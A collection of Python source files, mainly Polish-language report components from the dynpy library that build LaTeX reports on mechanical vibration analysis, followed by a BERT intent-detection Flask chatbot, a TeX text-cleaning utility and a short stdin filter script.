TitlePageComponent(Environment):\n \n latex_name='titlepage'\n \n def __init__(self, system=None, options=None, arguments=None, start_arguments=None,\n **kwargs):\n r\"\"\"\n Args\n ----\n options: str or list or `~.Options`\n Options to be added to the ``\\begin`` command\n arguments: str or list or `~.Arguments`\n Arguments to be added to the ``\\begin`` command\n start_arguments: str or list or `~.Arguments`\n Arguments to be added before the options\n \"\"\"\n\n self.system = system\n self.options = options\n self.arguments = arguments\n self.start_arguments = start_arguments\n\n \n \n super().__init__(options=options, arguments=arguments, start_arguments=start_arguments,**kwargs)\n \n if self.system is not None:\n\n \n system = self.system\n\n\n \n self.append(NoEscape('\\centering'))\n\n self.append(NoEscape('\\\\Huge DRGANIA MECHANICZNE \\n \\n'))\n \n self.append(Command('vspace',arguments='1cm'))\n\n \n \n if len(system.q)==1:\n dof_str = 'JEDNYM STOPNIU SWOBODY'\n else:\n dof_str = 'WIELU STOPNIACH SWOBODY'\n \n if system._dissipative_potential==0 or system._dissipative_potential is None:\n damping_str = 'NIETŁUMIONE'\n else:\n damping_str = 'TŁUMIONE'\n\n \n self.append(NoEscape(f'\\\\Large {damping_str} UKŁADY O {dof_str} \\n \\n')) \n \n self.append(Command('vspace',arguments='1cm'))\n \n self.append(NoEscape(f'{system._label} \\n \\n'))\n \n self.append(Command('vspace',arguments='1cm'))\n \n self.append(Command('MyAuthor'))\n self.append(NoEscape(f'\\\\par'))\n self.append(Command('vspace',arguments='1cm'))\n \n #self.append(Command('vspace',arguments='1cm'))\n #self.append(NoEscape(f'\\\\protect\\\\par'))\n #self.append(NewLine())\n self.append(Command('MyDate'))\n\n \n\n\n \nclass ExemplaryPictureComponent(ReportComponent):\n \n title=\"Przykład rzeczywistego obiektu\"\n packages=[Package('float')] \n \n def append_elements(self):\n \n system = self._system\n\n display(ReportText(f'''Ilustracja przedstawia rzeczywisty obiekt mechaniczny, będący przedmiotem modelowania i analizy dynamicznej.\n '''))\n\n with self.create(Figure(position='H')) as fig:\n fig.add_image(system._real_example(),width='8cm')\n\n display(ReportText(f'''Model dynamiczny układu określa się na podstawie analizy rozważanego przypadku. \n Należy pamiętać, że stopień odwzorowania (poziom abstrakcji) modelu zależy od tego do czego planuje się go używać.\n ''')) \n\n \nclass SchemeComponent(ExemplaryPictureComponent):\n title=\"Schemat układu\"\n\n\n def append_elements(self):\n \n system = self._system\n\n display(ReportText(f'''Ilustracja przedstawia schemat rzeczywistego obiektu mechanicznego, wyznaczony na podstawie uprzedniej analizy rzeczywistego obiektu.\n '''))\n \n with self.create(Figure(position='H')) as fig:\n fig.add_image(system._scheme(),width='8cm')\n\n display(ReportText(f'''Analizując przedstawiony układ można stwierdzić, że jego liczba stopni swobody to {len(system.q)}.\n '''))\n\n\n\nclass NumericalAnalysisComponent(ExemplaryPictureComponent):\n title=\"Symulacja numeryczna\"\n\n _default_ics = None\n _default_parameters = {}\n _default_tspan = np.linspace(0,1,1000)\n \n @classmethod\n def set_default_ics(cls,default_ics=None):\n \n if default_ics is None:\n cls._default_ics = default_ics\n \n return cls\n\n @classmethod\n def set_default_parameters(cls,default_parameters=None):\n \n if default_parameters is None:\n cls._default_parameters = default_parameters\n \n return cls\n \n @classmethod\n def set_default_tspan(cls,default_tspan=None):\n \n if default_tspan is None:\n cls._default_tspan = default_tspan\n \n return cls\n \n\n def append_elements(self):\n \n system = self._system\n\n display(ReportText(f'''Dla Damiana :P\n '''))\n if self._default_ics is None:\n ics = list(system.Y*0.0)\n else:\n ics = self._default_ics\n \n sym_res = system.subs(self._default_parameters).numerized().compute_solution(self._default_tspan,ics)\n\n LatexDataFrame.formatted(sym_res).plotted(preview=True)\n \n\n display(ReportText(f'''Dla Damiana :P\n '''))\n\nclass KineticEnergyComponent(ReportComponent):\n \n title=\"Energia kinetyczna\"\n \n def append_elements(self):\n \n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n \n\n\n display(ReportText(f'''\n Energia kinetyczna układu wyrażona jest wzorem:\n \n '''))\n \n\n display(SympyFormula( Eq(Symbol('T'),\n dyn_sys_lin._kinetic_energy) , marker=None))\n \n display(ReportText(f'''\n Wyznaczona wielkość określa energię układu wynikającą z jego własności inercyjnych (energię zmagazynowaną w elementach bezwładnych).\n \n '''))\n \n \n \nclass PotentialEnergyComponent(ReportComponent):\n \n title=\"Energia potencjalna\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Energia potencjalna układu wyrażona jest wzorem:\n '''))\n\n display(SympyFormula( Eq(Symbol('V'),\n dyn_sys_lin._potential_energy ), marker=None))\n\n display(ReportText(f'''\n Zaprezentowana zależność opisuje oddziaływanie potencjalnych pól sił w których znajduje się obiekt.\n ''')) \n \nclass DissipationComponent(ReportComponent): # Marcel\n \n title=\"Dyssypacyjna funkcja Rayleigh'a\"\n \n def append_elements(self):\n \n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n \n\n display(ReportText(f'''\n Energia rozpraszana tłumieniem wyrażona jest wzorem:\n \n '''))\n\n display(SympyFormula( Eq(Symbol('D'),\n dyn_sys_lin._dissipative_potential) , marker=None ))\n\n display(ReportText(f'''\n Podana zależność stanowi potencjał dysynpacyjny Rayleigh'a, \n który poddany różniczkowaniu względem wektora prędkości uogólnionych pozwala na określenie sił wiskotycznego tłumienia.\n '''))\n \nclass SpringForce(ReportComponent):\n \n title=\"Siła od sprężyny\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Siła od sprężyny wyrażona jest wzorem:\n '''))\n display(SympyFormula( Eq(Symbol('F'),-1*system._left_mount.stiffness*system.z,evaluate=False)))\n \n display(ReportText(f'''\n zamiast x używam steady solution\n '''))\n\n display(SympyFormula( Eq(Symbol('F'),-1*system._left_mount.stiffness*system.steady_solution(),evaluate=False)))\n\n\n display(ReportText(f'''\n Siła od sprężyny, zwana również siłą naciągu, pojawia sie przy ściskaniu lub rozciaganiu. Siła, która działa jest przeciwnie skierowana do ruch i chce przywrócić do pierwotnego jej położenia. Zależy od sztywności sprężyny k oraz od tego o ile została rozciagnieta bądź skrócona x.\n '''))\n \nclass DamperForce(ReportComponent):\n \n title=\"Siła tłumienia\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Siła tłumienia wyrażona jest wzorem:\n '''))\n\n display(SympyFormula( Eq(Symbol('F'),-1*system.c*system.v,evaluate=False)))\n\n display(ReportText(f'''\n zastępuje prędkość jako pochodna steady stolution po czasie:\n '''))\n\n display(SympyFormula( Eq(Symbol('F'),-1*system.c*system.steady_solution().diff(system.ivar),evaluate=False)))\n\n display(ReportText(f'''\n Siła tłumienia zmniejsza amplitude drgań, ma zwrot przeciwny do prędkości. Zależy od współczynnika tłumienia b oraz od prędkości v.\n ''')) \nclass LogarithmicDecrement(ReportComponent):\n \n title=\"logarytmiczny dekrement tłumienia liczony z amplitud\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Logarytmiczny dekrement tłumienia wyrażona jest wzorem przy pomocy amplitud:\n '''))\n\n display(SympyFormula( Eq(Symbol('delta'),log(system.A_n1/system.A_n2))))\n\n\n display(ReportText(f'''\n Zaprezentowana zależność opisuje bezwymaiarową wielkość charakteryzującą intensywność tłumienia drgań swobodnych w przypadku podkrytycznym. Jest to wielkość stała dla rozpaywanego układu drgającego i nie zależy od warrunków początkowych. Zależy natomiast od maksymalnych wychyleń w chwilach różniących się o okres drań tłumionych.\n '''))\n display(ReportText(f'''\n Logarytmiczny dekrement tłumienia u wyrażona jest wzorem przy pomocy okresu drgań tłumionych:\n '''))\n display(SympyFormula( Eq(Symbol('delta'),2*pi*system.damping_coefficient()*(system.natural_frequencies())**-1,evaluate=False)))\n \n display(ReportText(f'''\n Zaprezentowana zależność opisuje bezwymaiarową wielkość charakteryzującą intensywność tłumienia drgań swobodnych w przypadku podkrytycznym. Jest to wielkość stała dla rozpaywanego układu drgającego i nie zależy od warrunków początkowych.Zależy natomiast od okresu drań tłumionych i współczynnika h.\n '''))\n\n\nclass LagrangianComponent(ReportComponent):\n \n title=\"Lagrangian (funkcja Lagrange'a) układu\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys.linearized()\n\n \n print(system._scheme())\n \n mrk_lagrangian_nonlin=Marker('lagrangianNL',prefix='eq')\n\n #display(ReportText(f'''The following model is considered. The system's Lagrangian is described by the formula ({Ref(mrk_lagrangian_nonlin).dumps()}):\n # '''))\n display(ReportText(f'''Lagrangian systemu wyrażony jest wzorem ({AutoMarker(Eq(Symbol('L'),dyn_sys.L.expand()[0]))}):\n '''))\n\n display((SympyFormula( Eq(Symbol('L'),dyn_sys.L.expand()[0]) , marker=mrk_lagrangian_nonlin ) ))\n \n q_sym =[ Symbol(f'{coord}'[0:-3]) for coord in dyn_sys.q]\n \n diffL_d=lambda coord: Symbol(f'\\\\frac{{ \\\\partial L}}{{ \\\\partial {vlatex(coord)} }}')\n diffD_d=lambda coord: Symbol(f'\\\\frac{{ \\\\partial D}}{{ \\\\partial {vlatex(diff(coord))} }}')\n d_dt_diffL_d=lambda coord: Symbol(f'\\\\frac{{ \\\\mathrm{{d}} }}{{ \\\\mathrm{{d}} {vlatex(system.ivar)} }} {vlatex(diffL_d(coord))} ') \n\n display(ReportText(f'''Równania Eulera-Lagrange'a dla rozważanego przypadku są nastęujące: \n '''))\n \n for coord in dyn_sys.q:\n display((SympyFormula( Eq(d_dt_diffL_d(coord.diff(system.ivar)) - diffL_d(coord) + diffD_d(coord),Symbol(f'Q_{{ {vlatex(coord)} }}^N')) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n \n \n display(ReportText(f'''Kolejne pochodne wynikające z zastosowania równań Eulera-Lagrange'a są nastęujące: \n '''))\n \n for coord in dyn_sys.Y:\n display((SympyFormula( Eq(diffL_d(coord),dyn_sys.L.expand()[0].diff(coord)) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n \n\n\n for coord in dyn_sys.q.diff(system.ivar):\n display((SympyFormula( Eq(d_dt_diffL_d(coord),dyn_sys.L.expand()[0].diff(coord).diff(system.ivar)) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n for coord in dyn_sys.q:\n display((SympyFormula( Eq(diffD_d(coord),(S.One/2 * diff(dyn_sys.q.transpose())* dyn_sys_lin.damping_matrix()* diff(dyn_sys.q))[0].diff(diff(coord))) , marker=mrk_lagrangian_nonlin,backend=vlatex ) ))\n #display(Markdown(f'\\\\begin{equation} \\\\end{equation}').reported())\n #with doc_model.create(DMath()) as eq:\n # eq.append(NoEscape(latex(Derivative(Symbol('L'),q_sym[0],evaluate=False))))\n # eq.append(NoEscape('='))\n # eq.append(NoEscape(vlatex(dyn_sys.L.expand()[0].diff(dyn_sys.q[0]))))\n\n mrk_gov_eq_nonlin=Marker('gov_eq_nonlin_sys',prefix='eq')\n\n #display(ReportText(f'''The governing equations of the system have a following form ({Ref(mrk_gov_eq_nonlin).dumps()}):\n # '''))\n\n display(ReportText(f'''Wyniki przedstawionych operacji wykorzystuje się wyznaczenia równań ruchu układu.\n '''))\n\n\n \n def as_frame(self):\n frame=Frame(title=self.title,options=['allowframebreaks'])\n #frame.packages +(self.packages)\n frame+=(list(self))\n return frame\n \n \nclass GoverningEquationComponent(ReportComponent):\n \n title=\"Równania ruchu\"\n \n def append_elements(self):\n \n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys.linearized()\n\n \n\n \n if len(system.q)==1:\n markers_str=f\"przedstawia zależność ({AutoMarker(Eq(dyn_sys._eoms[0].simplify().expand(),0))})\" \n else:\n markers_str=f\"przedstawiają zależności ({AutoMarker(Eq(dyn_sys._eoms[0].simplify().expand(),0))})-({AutoMarker(Eq(dyn_sys._eoms[-1].simplify().expand(),0))})\"\n\n display(ReportText(f'''\n Wykorzystując obliczone pochodne, wyznacza się równania ruchu na podstawie odpowiedniego wzoru.\n Równania ruchu układu (nieliniowe w ogólnym przypadku) {markers_str}:\n '''))\n \n for eq in dyn_sys._eoms:\n display(SympyFormula( Eq(eq.simplify().expand(),0) , marker=None))\n\n display(ReportText(f'''\n Wyznaczone równania stanowią matematyczny opis dynamiczny właściwości układu.\n Dalsza analiza pozwala na skuteczną analizę działania modelowanego obiektu i określenie jego parametrów mechanicznych.\n '''))\n\n\nclass LinearizationComponent(ReportComponent):\n \n title=\"Linearyzacja równań ruchu\"\n \n def append_elements(self):\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n coords=tuple(list(dyn_sys.Y) + list(dyn_sys.q.diff(t,t)))\n op_point = {coord: 0 for coord in coords}\n\n #display(self._op_points(hint=hint, subs=True))\n op_point.update(dyn_sys._op_points(subs=True)[0])\n\n\n mrk_lagrangian_nonlin = Marker('lagrangLin',prefix='eq')\n mrk_lagrangian_lin = Marker('lagrangLin',prefix='eq')\n\n display(ReportText(\n f'''Linearyzaja równań polega na znalezieniu ich rozwinięcia w szereg Taylora względem współrzędnych, prędkości i przyspieszeń uogólnionych w otoczeniu punktu równowagi.\n Celem uproszczenia wprowadzono następujące oznaczenia:'''))\n\n for coord in coords:\n display((SympyFormula( Eq(Symbol(vlatex(coord)),Symbol(latex(coord))) , marker=mrk_lagrangian_lin ) )) \n\n\n\n display(ReportText(\n f'''Punkty równowagi rozważanego układu są następujące:\n ''')) \n\n for eq_coord,val in op_point.items():\n display((SympyFormula( Eq(eq_coord,val) , marker=mrk_lagrangian_lin ) ))\n\n\n diffL_d=lambda coord: Symbol(latex(Derivative(Symbol('L'),Symbol(vlatex(coord)))) )\n\n\n\n for no,eom in enumerate(dyn_sys._eoms):\n\n\n\n\n eq_sym=Symbol(f'RR_{latex(dyn_sys.q[no])}')\n\n\n display(ReportText(f'''Równanie ruchu dla współrzędnej ${latex(dyn_sys.q[no])}$ można przestawić jako:\n '''))\n\n display((SympyFormula( Eq(eq_sym,eom,evaluate=False) , marker=mrk_lagrangian_lin,backend=latex ) ))\n\n\n display(ReportText(\n f'''Formalnie należy obliczyć pochodne cząstkowe wielkości uogólnionych ze składników równań Lagrange'a:\n '''))\n\n\n display((SympyFormula( Eq(MultivariableTaylorSeries(eq_sym,coords,n=1,x0=op_point)._symbolic_sum(),0) , marker=None,backend=latex ) ))\n\n diff_list=MultivariableTaylorSeries(eom,coords,n=1,x0=op_point).calculation_steps(expr_symbol=eq_sym)\n\n display(ReportText(\n f'''Poszczególne pochodne mają następującą postać:\n '''))\n\n for diff_eq in diff_list:\n\n display((SympyFormula( diff_eq , marker=mrk_lagrangian_lin,backend=latex ) ))\n\n display(ReportText(f'''Po podstawieniu obliczonych pochodnych, otrzumuje się następujące zlinearyzowane równanie:\n '''))\n display((SympyFormula( Eq(MultivariableTaylorSeries(eom,coords,n=1,x0=op_point).doit().expand().simplify().expand(),0,evaluate=False) , marker=mrk_lagrangian_lin,backend=latex ) ))\n\n\n\n AutoBreak.latex_backend = latex_store\n\n\n \nclass FundamentalMatrixComponent(ReportComponent):\n \n title=\"Wyznaczanie macierzy fundamentalnej\"\n \n def append_elements(self):\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n\n display(ReportText(f'''Z równań ruchu wyznaczono macierz mas i sztywności układu:\n '''))\n display((SympyFormula( Eq(Symbol('M'),dyn_sys_lin.inertia_matrix(),evaluate=False) , marker='a' ) ))\n\n display((SympyFormula( Eq(Symbol('K'),dyn_sys_lin.stiffness_matrix(),evaluate=False) , marker='a') ))\n\n Delta = Symbol('\\Delta')\n\n display(ReportText(f'''Macierz fundamentalna, na podstawie której wyznaczono równanie charakterystyczne rozważanego układu ${latex(Delta)}$, przedstawiają się następująco:\n '''))\n\n display((SympyFormula( Eq(Symbol('A'),dyn_sys_lin.fundamental_matrix(),evaluate=False) , marker='a' ) ))\n display((SympyFormula( Eq(Delta,dyn_sys_lin.fundamental_matrix().det().expand().simplify().simplify().expand(),evaluate=False) , marker='a',backend=latex ) ))\n\n display(ReportText(f'''Macierz fundamentalna pozwala określić rozwiązanie ustalone. Natomiast bazując na równaniu charakterystycznym określa się częstości własne układu.\n '''))\n\n AutoBreak.latex_backend = latex_store\n\nclass GeneralSolutionComponent(ReportComponent):\n \n title=\"Rozwiązanie ogólne\"\n \n def append_elements(self):\n\n from ...dynamics import LagrangesDynamicSystem, HarmonicOscillator\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n\n display(ReportText(f'''Rozwiązanie ogólne przedstawia wyrażenie:\n '''))\n display((SympyFormula( Eq(Symbol('X'),HarmonicOscillator(dyn_sys_lin.linearized(\n )).general_solution().n(3),\n evaluate=False) , marker='a',backend=latex ) ))\n\n display(ReportText(f'''Rozwiązanie ogólne opisuje ruch analizowanego układu (przedstawia przemieszczenie w funkcji czasu) i wynika z rozważań dotyczących drgań swobodnych układu.\n '''))\n\n AutoBreak.latex_backend = latex_store\n\n \n \nclass FrequencyResponseFunctionComponent(ReportComponent):\n \n title=\"Charakterystyka Amplitudowo-Częstotliwościowa\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n funkcja odpowiedzi częstotliwościowej:\n '''))\n\n display(SympyFormula( Eq(Symbol('frf'),\n dyn_sys.frequency_response_function() ), marker=None))\n\n display(ReportText(f'''\n jest to suma kwadratów amplitud pod pierwiastkiem\n ''')) \n \nFRFComponent = FrequencyResponseFunctionComponent\n\nclass FrequencyResponseFunctionComponentToSecond(ReportComponent):\n \n title=\"sens mocy układu\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n sens mocy układu:\n '''))\n\n display(SympyFormula( Eq(Symbol('frf^2'),\n dyn_sys.frequency_response_function().doit()**2 ), marker=None))\n\n display(ReportText(f'''\n Charakterystyka Amplitudowo-Częstotliwościowa podniesiona do kwadratu\n ''')) \n \n\n\n \n\nclass SteadySolutionComponent(ReportComponent):\n \n title=\"Rozwiązanie szczególne\"\n _phi=False\n def append_elements(self,phi=_phi):\n\n from ...dynamics import LagrangesDynamicSystem, HarmonicOscillator\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n\n display(ReportText(f'''Rozwiązanie szczególne przedstawia wyrażenie:\n '''))\n\n display((SympyFormula( Eq(Symbol('X_s'),\n HarmonicOscillator(dyn_sys_lin.linearized(\n )).steady_solution().n(3),\n evaluate=False) , marker='b',backend=latex ) ))\n\n AutoBreak.latex_backend = latex_store\n\n display(ReportText(f'''Rozwiązanie szczególne związane jest obecnością wielkości wymuszających ruch (drgania) analizowanego układu.\n '''))\n \nclass MaxStaticForce(ReportComponent):\n \n title=\"Maksymalna siła statyczna\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Wartość maksymalna siły statycznej działającej na pojedynczy element mocujący:\n '''))\n\n display(SympyFormula( Eq(Symbol('F_s'),\n dyn_sys.max_static_force().doit() ), marker=None))\n\n display(ReportText(f'''\n Wartość maksymalna siły statycznej działającej na pojedynczy element mocujący.\n ''')) \n \nclass MaxDynamicForce(ReportComponent):\n \n title=\"Maksymalna siła statyczna\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Wartość maksymalna siły dynamicznej działającej na pojedynczy element mocujący:\n '''))\n\n display(SympyFormula( Eq(Symbol('F_d'),\n dyn_sys.max_dynamic_force().doit() ), marker=None))\n\n display(ReportText(f'''\n Wartość maksymalna siły dynamicznej działającej na pojedynczy element mocujący:\n ''')) ","repo_name":"bogumilchilinski/dynpy","sub_path":"utilities/components/mechanics.py","file_name":"mechanics.py","file_ext":"py","file_size_in_byte":32155,"program_lang":"python","lang":"pl","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"6138599417","text":"import numpy as np\nimport pandas as pd\nimport re\nimport torch\nimport random\nimport torch.nn as nn\nimport json \nfrom transformers import AutoModel, BertTokenizerFast\nfrom transformers import DistilBertTokenizer, DistilBertModel\nfrom transformers import AutoModel, BertTokenizerFast\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\n\n# specify GPU\nUSE_CUDA = torch.cuda.is_available()\ndevice = torch.device(\"cpu\")\n\n# Converting the labels into encodings\nfrom sklearn.preprocessing import LabelEncoder\nle = LabelEncoder()\n# Based on the histogram we are selecting the max len as 8\nmax_seq_len = 8\n\nwords=[]\nclasses = []\ndocuments = []\nignore_words = ['?', '!']\n\ndata_file = open('server/agents/Intents_detection/intents.json').read()\nintents = json.loads(data_file)\n\n\nfor intent in intents['intents']:\n for pattern in intent['patterns']:\n\n #add documents in the corpus\n documents.append((pattern, intent['tag']))\n\n # add to our classes list\n if intent['tag'] not in classes:\n classes.append(intent['tag'])\n\n\ndf = pd.DataFrame(documents, columns = [\"text\", \"label\"])\ndf['label'] = le.fit_transform(df['label'])\n# check class distribution\ndf['label'].value_counts(normalize = True)\n# Load the BERT tokenizer\ntokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')\n# Import BERT-base pretrained model\nbert = AutoModel.from_pretrained('bert-base-uncased')\n\n# Load the DistilBert tokenizer\ntokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')\n# Import the DistilBert pretrained model\nbert = DistilBertModel.from_pretrained('distilbert-base-uncased')\n\n\nclass BERT_Arch(nn.Module):\n def __init__(self, bert): \n super(BERT_Arch, self).__init__()\n self.bert = bert \n \n # dropout layer\n self.dropout = nn.Dropout(0.2)\n \n # relu activation function\n self.relu = nn.ReLU()\n # dense layer\n self.fc1 = nn.Linear(768,512)\n self.fc2 = nn.Linear(512,256)\n self.fc3 = nn.Linear(256,9)\n #softmax activation function\n self.softmax = nn.LogSoftmax(dim=1)\n #define the forward pass\n def forward(self, sent_id, mask):\n #pass the inputs to the model \n cls_hs = self.bert(sent_id, attention_mask=mask)[0][:,0]\n \n x = self.fc1(cls_hs)\n x = self.relu(x)\n x = self.dropout(x)\n \n x = self.fc2(x)\n x = self.relu(x)\n x = self.dropout(x)\n # output layer\n x = self.fc3(x)\n \n # apply softmax activation\n x = self.softmax(x)\n return x\n\nfor param in bert.parameters():\n param.requires_grad = False\nmodel = BERT_Arch(bert)\nmodel.load_state_dict(torch.load(\"server/agents/Intents_detection/model.zip\", device))\nmodel = model.to(device)\n\ndef get_prediction(str, model):\n str = re.sub(r'[^a-zA-Z ]+', '', str)\n test_text = [str]\n model.eval()\n \n tokens_test_data = tokenizer(\n test_text,\n max_length = max_seq_len,\n pad_to_max_length=True,\n truncation=True,\n return_token_type_ids=False\n )\n test_seq = torch.tensor(tokens_test_data['input_ids'])\n test_mask = torch.tensor(tokens_test_data['attention_mask'])\n \n preds = None\n with torch.no_grad():\n preds = model(test_seq.to(device), test_mask.to(device))\n preds = preds.detach().cpu().numpy()\n preds = np.argmax(preds, axis = 1)\n print(\"Intent Identified: \", le.inverse_transform(preds)[0])\n return le.inverse_transform(preds)[0]\n\ndef get_response(message, model): \n intent = get_prediction(message, model)\n intents = json.loads(open('server/agents/Intents_detection/intents.json').read())\n for i in intents['intents']: \n if i[\"tag\"] == intent:\n result = random.choice(i[\"responses\"])\n message={ \"answer\":[{\"_type\": \"dialog\",\n \"message\": result}]}\n break\n #print(f\"Response : {result}\")\n return message\n\n\n#get_response(\"i need my certificate work \", model)\n\n\n\napp = Flask(__name__)\nCORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n@app.route('/api/search/smart-agent/search/', methods=['GET', 'POST'])\ndef test(term):\n chatbot_message = get_response(term, model)\n\n return jsonify(chatbot_message)\napp.run(debug=True, port=9090)\n","repo_name":"1feres1/DigitalBeing","sub_path":"server/agents/Intents_detection/intents_detect.py","file_name":"intents_detect.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32454258873","text":"\"\"\"Handling a Tex document.\"\"\"\n\nfrom __future__ import annotations # Support of `|` for type union in Python 3.9\nfrom typing import TextIO\n\nfrom knowledge_clustering import misc\n\n\nclass TexDocument:\n \"\"\"Class for handling a tex document.\"\"\"\n\n def __init__(self, tex_code: str) -> None:\n self.tex_code: str = tex_code\n self.lines: list[str] = self.tex_code.split(\"\\n\")\n self.__update_col_line()\n self.__clean()\n self.length: int = len(self.tex_cleaned)\n\n def __update_col_line(self) -> None:\n \"\"\"\n Compute two arrays, saying for each index i of self.text, at what column and\n what line of the text this index is located.\n \"\"\"\n self.find_line: list[int] = [0] * len(self.tex_code)\n self.find_col: list[int] = [0] * len(self.tex_code)\n line: int = 1\n col: int = 1\n for (position, letter) in enumerate(self.tex_code):\n self.find_line[position] = line\n self.find_col[position] = col\n if letter == \"\\n\":\n line += 1\n col = 1\n else:\n col += 1\n\n def __clean(self):\n \"\"\"\n Reads self.tex_code (the original tex file), given as a single string.\n Converts spaces, tabulations and new lines into a single space, except\n if there is two consecutive new lines. Removes commented lines.\n The cleaned file is stored in self.tex_cleaned. A pointer\n from tex_cleaned to tex_code, in the form of an array, is produced in self.pointer.\n \"\"\"\n # Essentially, the algorithm is a deterministic transducer with five states\n # 0: the last character is `normal` (not a space, a tab, nor a new line) ; initial state\n # 1: the last character is not normal,\n # and no new line was read since the last normal character\n # 2: the last character is not normal,\n # and exactly one new line was read since the last normal character\n # 3: the last character is not normal,\n # and at least two new lines were read since the last normal character\n # 4: the line is commented.\n def is_normal(letter: str) -> bool:\n return letter not in [\" \", \"\\t\", \"\\n\", \"%\"]\n\n def transition(\n state: int, letter: str, counter: int\n ) -> tuple[int, str, int | None]:\n \"\"\"\n Input: curent state, input letter and the size of produced output so far\n Output: returns the new state, the output, and the pointer of the input letter.\n \"\"\"\n if is_normal(letter):\n if state == 4:\n return (4, \"\", None)\n return (0, letter, counter)\n if letter == \"%\":\n return (4, \"\", None)\n if letter == \"\\n\":\n if state == 4:\n return (0, \"\", None)\n if state == 0:\n return (2, \" \", None)\n if state == 1:\n return (2, \"\", None)\n if state == 2:\n return (3, \"\\\\par \", counter)\n return (3, \"\", None)\n if letter in [\" \", \"\\t\"]:\n if state == 0:\n return (1, \" \", counter)\n return (state, \"\", None)\n raise Exception(\"Transition not defined\", state, letter)\n\n state: int = 0\n tex_cleaned: str = \"\"\n m: int = 0\n pointer: list[None | int] = []\n for position, letter in enumerate(self.tex_code):\n state, output, input_pointer = transition(state, letter, m)\n tex_cleaned += output\n m += len(output)\n # Put position at index input_pointer\n if input_pointer is not None:\n pointer += [None] * (input_pointer - len(pointer)) + [position]\n self.tex_cleaned: str = tex_cleaned\n self.pointer: list[None | int] = pointer\n\n def print(self, start: int, end: int, n: int, out: TextIO):\n \"\"\"\n Prints the lines between positions (in the clean tex) `start` and `end`\n together with `n`-1 lines preceding `start`.\n Emphasize the part between `start` and `end`.\n \"\"\"\n start_p = self.pointer[start]\n end_p = self.pointer[end]\n if isinstance(start_p, int) and isinstance(end_p, int):\n l_start: int = self.find_line[start_p]\n c_start: int = self.find_col[start_p]\n l_end: int = self.find_line[end_p]\n c_end: int = self.find_col[end_p]\n for i in range(max(0, l_start - n), l_end):\n if i + 1 == l_start and i + 1 == l_end:\n print(\n f\"l{i+1}: \\t{self.lines[i][:c_start-1]}\"\n + misc.emph(self.lines[i][c_start - 1 : c_end])\n + self.lines[i][c_end:],\n file=out,\n )\n elif i + 1 == l_start:\n print(\n f\"l{i+1}: \\t{self.lines[i][:c_start-1]}\"\n + misc.emph(self.lines[i][c_start - 1 :]),\n file=out,\n )\n elif i + 1 == l_end:\n print(\n f\"l{i+1}: \\t\"\n + misc.emph(self.lines[i][:c_end])\n + self.lines[i][c_end:],\n file=out,\n )\n elif l_start < i + 1 and i + 1 < l_end:\n print(f\"l{i+1}: \\t\" + misc.emph(self.lines[i]), file=out)\n else:\n print(f\"l{i+1}: \\t{self.lines[i]}\", file=out)\n else:\n raise Exception(\"Undefined pointer\", self.pointer, (start, end))\n","repo_name":"remimorvan/knowledge-clustering","sub_path":"knowledge_clustering/tex_document.py","file_name":"tex_document.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"8616493007","text":"import sys\n\nfile_with_keys = sys.argv[1]\n\nkeys = [tuple(line.rstrip('\\n').split(',')) for line in open(file_with_keys,'r')]\n\nfor line in sys.stdin:\n *key, value = line.strip().split(',')\n\n if tuple(key) in keys:\n print(value)","repo_name":"VladimirNikiforov/netology-ds","sub_path":"02. Python_and_Statistics/py/bonus_script.py","file_name":"bonus_script.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"37733666322","text":"from 